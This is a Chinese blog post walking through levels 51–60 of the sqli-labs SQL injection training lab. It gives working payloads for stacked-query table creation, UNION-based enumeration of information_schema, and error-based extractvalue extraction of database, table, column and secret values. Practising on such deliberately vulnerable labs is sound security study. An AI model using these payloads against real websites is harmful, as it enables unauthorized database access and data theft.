sql-lib闯关秘籍之51-60关

下面开始11-20关,之前不会的关卡可以参考我这几篇文章: sql-lib闯关秘籍之1-10关sql-lib闯关秘籍之11-20关sql-lib闯关秘籍之21-30关, sql-lib闯关秘籍之31-40关 ,sql-lib闯关秘籍之41-50关

不管是第几关,我们的最终目标是获得用户密码,从而获取最高权限!

以下的学习过程中如果遇到那里不会的或者不清楚的地方,欢迎大家留言,我将尽力帮助大家~

 第五十一关

这一关和三十八关基本一样 ,堆叠注入问题  只不过是字符型                  ?sort=1';create table test51 like users;%23

 

 

 看数据库发现有啦

 

 

 第五十二关

和五十关一样,只不过不显示错误
?sort=1;create table test52 like users;%23

堆叠注入

 

 

 

 

 

 第五十三关

和五十一关一样,区别是不显示错误

?sort=1';create table test53 like users;%23

 

 

 

 第五十四关

这一关没什么特别  特别在于查询的次数 ,只能输入10次注入信息,记录方式是cookie。 

查库  ?id=-1%27%20union%20select%201,database(),%273

 

 查表     ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

 

 爆列      ?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='i58u96bgqr(后面这关name是咱们刚才查到的)

 

 爆数据        ?id=-1' union select 1,group_concat(secret_6KHN),3 from i58u96bgqr%23(爆咱刚才查到的一张表的数据)

将我们刚才获得的输入得到这个

 

 第五十五关

和上一关一样,加了一个小括号 通过测试发现是加了小括号,一共可以输入14次

 

 查表        ?id=-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23(和上一关一样就是把引号改成括号了,是吧)

 

 第五十六关

和之前一样,通过测试发现是单引号括号闭合,其他的操作一样,我就不截图了

 

看数据库名      ?id=-1') union select 1,database(),3%23

 第五十七关

经过测试,发现是双引号闭合,其他和前几关一样

 

 查询数据库名                ?id=-1" union select 1,database(),3%23(基本一样不再截图)

 

 第五十八关

我发现这机关的颜色搭配挺好看哈,这关好像只有5次机会啊。。。

 

 

 后来发现没有回显,一查,这一关不能用union select语句了,那我们报错试一下

 

 报错输入获得数据库名                   ?id=0' and extractvalue(1, concat(0x5c, (select database())))%23

 

 那就说明报错说明可以的,报错注入在之前的文章有介绍,不在这里在做解释

 第五十九关

和上一关一样只不过没有单引号

 报错输入获得数据库名                   ?id=0 and extractvalue(1, concat(0x5c, (select database())))%23

 

 第六十关

和上一关一样,只不过多了双引号和括号?id=0”)

 报错输入获得数据库名                  ?id=0") and extractvalue(1, concat(0x5c, (select database())))%23

 

 获取表名      ?id=0") union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+

 

 爆列名      ?id=-1") union select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='wapsbffje5'),0x7e))--+

 

 爆数据      ?id=-1") union select extractvalue(1,concat(0x7e,(select group_concat(secret_XSR5) from wapsbffje5),0x7e))--+

 

 输入进去        RsPZ518K3ZvXCVOvrGbhuqAZ  你搞定了他

 

 哈哈哈哈哈,结束了60关了

51-60关结束

 

该文章有参考了以下的网页:

 

SQL注入靶场sqli-labs 1-65关全部通关教程

SQLi_Labs通关文档【1-65关】

 sqli-labs 1-65教程

posted @ 2020-01-28 19:22  泷十三  阅读(266)  评论(0编辑  收藏  举报